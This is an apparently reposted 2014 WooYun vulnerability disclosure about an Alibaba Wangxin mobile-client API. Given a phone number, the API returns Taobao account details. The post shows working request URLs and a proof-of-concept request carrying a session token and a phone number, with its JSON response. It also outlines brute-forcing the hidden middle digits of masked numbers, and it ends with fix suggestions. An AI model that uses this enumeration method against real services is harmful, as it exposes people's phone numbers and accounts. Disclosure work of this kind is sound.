记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

淘宝网某手机客户端可以获取手机账号等敏感信息

2014-08-16 17:20

该漏洞存在于旺信(阿里旺旺手机客户端安卓版),1.7版以下是可以看到的,最新版本虽然在软件界面中看不到,单接口一样存在的!

测试的是1.77版 在添加好友中有个精确查找功能,可以根据手机号或淘宝账号查找,这种设计就很容易泄露私隐信息,所以到了2.0版本以上的程序员可能意识到会泄露私隐取消了根据手机号查找账号的功能。最新版本只有根据账号查找。但这个接口还是存在的!、



下面的接口两个都是可以用的:

http://yiliao.hupan.com/api/wxuser/nameCard.json?userId=登陆的账号&token=登陆账号的token&username=手机号或账号



http://wxapi.taobao.com/api/wxuser/nameCard.json?userId=登陆的账号&token=登陆账号的token&username=手机号或账号



1.根据手机号获取淘宝账号



直接用该接口就可以获取到登陆账号信息,最近登陆时间,登陆时用的手机系统信息。

返回

tbnick 代表淘宝账号



os_version 代表登陆时用的手机系统版本比如是安卓或者iphone



last_login_time 代表最后登陆时间



2.根据账号获取手机号码

这个不是直接可以获取到,但可以通过暴力破解方式很容易获取到。

输入账号后返回的信息中包含了

"phone_num":"189*****888"的手机号码方式,也就是只隐藏了中间了5位号码,也就可以造成暴力破解的可能。枚举189*****888号码段,根据接口返回淘宝账号和要破解的账号对比,账号一样就表示该手机号码就是要破解的账号手机号码。 理论上就是10万次左右,破解只是时间问题,关键是接口未做暴力破解的任何限制!











漏洞证明:

用的是本人淘宝小号测试



http://yiliao.hupan.com/api/wxuser/nameCard.json?userId=cnhhupan%E4%BD%8E%E8%B0%83%E7%9A%84%E7%94%B7%E4%BA%BA70&token=92f475616433c1912a016d5dc2dc2c98_v1&username=13560162597

返回信息



{"code":200,"msg":"success","data":{"user_id":"cnhhupan低调的男人70","name":"dtdnr07","avatar":"http://img02.taobaocdn.com/tps/i2/T1zHHoXapqXXbCFbsb-100-100.jpg_120x120.jpg","gender":"保密","full":"dtdnr07","shortname":"DTDNR07","phone_num":"135*****597","last_login_time":1404267878,"verify_flag":1,"os_version":"android_3.1","ww_user":1,"tbnick":"低调的男人70","settingKey1":"1","settingVaules":{"nick":"","receiveWwPcOL":"1","keepOnline":"1","pushWwPcOL":"0","runInBackground":"0","tribeRecvFlags":"[]","nonPushAtNight":"0","msgRemindNoDisturb":"{\"endMinute\":0,\"endHour\":8,\"startMinute\":0,\"type\":1,\"startHour\":23}","logis":"0","eAppSummaryViews":"[{\"pid\":2,\"id\":1},{\"pid\":1,\"id\":1},{\"pid\":3,\"id\":1},{\"pid\":4,\"id\":1}]","eAppWidgets":"[{\"pid\":2,\"id\":1},{\"pid\":1,\"id\":1},{\"pid\":3,\"id\":1},{\"pid\":4,\"id\":1}]","eAppStatistics":"[]","eAppPcStatistics":"[]","eAppCategory":"[2,1,3,4]"},"userIdentity":1}}

修复方案:

1.建议从接口取消用手机查找账号功能

2.手机号码公开显示是否采取显示后4位方式?

3.取消显示最后登陆时间显示

4.取消显示登陆手机版本

5.抓包发现旺信中很多采用了HTTP接口,建议采用TCP或UDP加密通讯,至少采用HTTP接口也做下加密处理。

知识来源: www.wooyun.org/bugs/wooyun-2014-066949

阅读:91267 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“淘宝网某手机客户端可以获取手机账号等敏感信息”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云